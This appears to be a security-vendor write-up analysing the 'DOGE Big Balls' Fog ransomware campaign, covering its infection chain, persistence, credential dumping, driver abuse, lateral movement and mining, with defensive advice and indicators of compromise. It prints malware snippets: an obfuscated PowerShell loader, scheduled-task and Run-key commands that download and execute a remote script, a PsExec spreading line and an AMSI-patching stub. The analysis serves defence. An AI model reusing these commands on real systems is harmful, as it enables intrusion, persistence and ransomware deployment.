A recent analysis of newly discovered payloads linked to the DOGE Big Balls ransomware operation reveals a complex infection chain combining open-source tools, kernel-level exploits, and psychological warfare. This variant of the Fog ransomware employs a multi-phase approach to establish persistence, escalate privileges, and propagate across networks, with attackers frequently updating their payloads to evade detection.
Infection chain and persistence mechanisms
The campaign begins with an MSI installer (payload.msi) that executes a heavily obfuscated PowerShell script (wix.ps1). The script uses single-byte XOR and base64 encoding to hide its intent:
# Decoded snippet from wix.ps1
$xorKey = 0x3F
$encodedScript = "BASE64_ENCODED_PAYLOAD"
$decodedBytes = [System.Convert]::FromBase64String($encodedScript)
$decryptedScript = $decodedBytes | ForEach-Object { $_ -bxor $xorKey }
iex ([System.Text.Encoding]::ASCII.GetString($decryptedScript)) This script creates an LNK shortcut (EdgeAutoUpdater.lnk) in the Windows Startup directory to execute stage1.ps1 on login. For administrative access, it also deploys a Scheduled Task:
schtasks /create /tn "EdgeAutoUpdaterTask" /tr "powershell -ExecutionPolicy Bypass -Command iwr -Uri [REDACTED]/stage1.ps1 | IEX" /sc once /st 00:00 Privilege escalation and lateral movement
The stage1.ps1 script orchestrates credential dumping via Mimikatz and Rubeus, while exploiting CVE-2015-2291 through the vulnerable iQVW64.sys driver. Attackers use the BYOVD (Bring Your Own Vulnerable Driver) technique to load a custom kernel tool (ktool.exe), granting SYSTEM-level access.
Key tactics include:
- AMSI Bypass: the
amsibypass.ps1script patches theAmsiScanBufferfunction to disable antivirus scans: textmov eax, 80070057 ret - Lateral movement: the
worm.ps1script deploys PsExec to propagate across Active Directory environments: bashreg add HKLM\...\Run /v UpdaterService /d "powershell -w hidden iwr [REDACTED]/stage1.ps1 | IEX" psexec \\[TARGET] -c C:\Windows\Temp\PsExec64.exe - ZeroTier integration: the
ztinstall.ps1script joins infected machines to a private ZeroTier network (ID:e3918db483e97c3f), enabling persistent remote access.
Monetization and anti-analysis
Beyond ransomware deployment, attackers leverage:
- Cryptocurrency mining: the
xmrigstart.ps1script executes an XMRig miner targeting the Monero wallet8BSDR3NXiScgvyBshu8qunNdqURqMocHdJ. - Dynamic payload updates: payloads hosted on Netlify are frequently rotated, with observed shifts from Meterpreter loaders to Fog ransomware binaries.
Defensive recommendations
- Monitor PowerShell activity: flag suspicious command chains like
iwr | IEXor AMSI bypass patterns. - Restrict driver loading: block vulnerable drivers (e.g.,
iQVW64.sys) via Microsoft Vulnerable Driver Blocklist. - Analyze scheduled tasks: hunt for tasks with non-standard names (e.g.,
EdgeAutoUpdaterTask) or PowerShell execution. - Block Netlify domains: use DNS filtering to prevent connections to
*.netlify.appunless explicitly whitelisted.
This campaign underscores the blurred line between ransomware operations and advanced persistent threats (APTs), with attackers investing in both technical sophistication and infrastructure agility. The use of humor (e.g., “DOGE BIG BALLS”) and political references in ransom notes further complicates attribution, a trend likely to persist in 2025’s threat landscape.
Indicators of Compromise (IOCs):
- SHA256: [Redacted – see Netskope GitHub repository]
- C2 URLs:
gentle-chebakia-da1172.netlify.app,http://172.22.173.171:80/a - ZeroTier Network ID:
e3918db483e97c3f
For full YARA rules and script samples, refer to Netskope’s GitHub repository.